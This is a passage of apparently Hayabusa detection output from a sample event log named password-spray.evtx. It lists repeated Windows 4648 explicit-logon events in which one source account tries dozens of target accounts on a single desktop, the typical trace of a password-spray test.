Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:24.660 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:25.732 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:26.794 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:27.863 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:28.925 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:29.993 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:31.050 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:32.142 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:33.206 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:34.265 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:35.340 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:36.403 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:37.453 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:38.533 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:39.613 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:40.691 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:41.769 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:42.852 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:43.922 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:44.998 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:46.080 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:47.159 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:48.237 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:49.314 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:50.388 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:51.455 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:52.532 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:53.613 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:54.668 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:55.714 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:56.768 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:57.850 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:58.920 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:00.029 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:01.113 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:02.172 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:03.238 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:04.300 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:05.378 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:06.439 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:07.513 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:08.581 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:09.674 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:10.754 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:11.843 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:12.917 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:13.987 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:15.045 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:16.136 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:17.201 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:18.302 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:19.372 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:20.450 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:21.552 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:22.656 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:23.749 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:24.832 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:25.919 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:26.998 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:28.103 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:29.187 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:30.262 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:31.362 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:32.419 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:33.499 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:34.577 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:35.670 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:36.716 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:37.815 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:38.872 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:39.954 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:41.028 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:42.075 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:43.142 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:44.208 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:45.284 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:46.379 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:47.433 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:48.512 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:49.576 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:50.656 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:51.729 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:52.823 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:53.886 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:54.942 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:56.019 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:57.107 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : 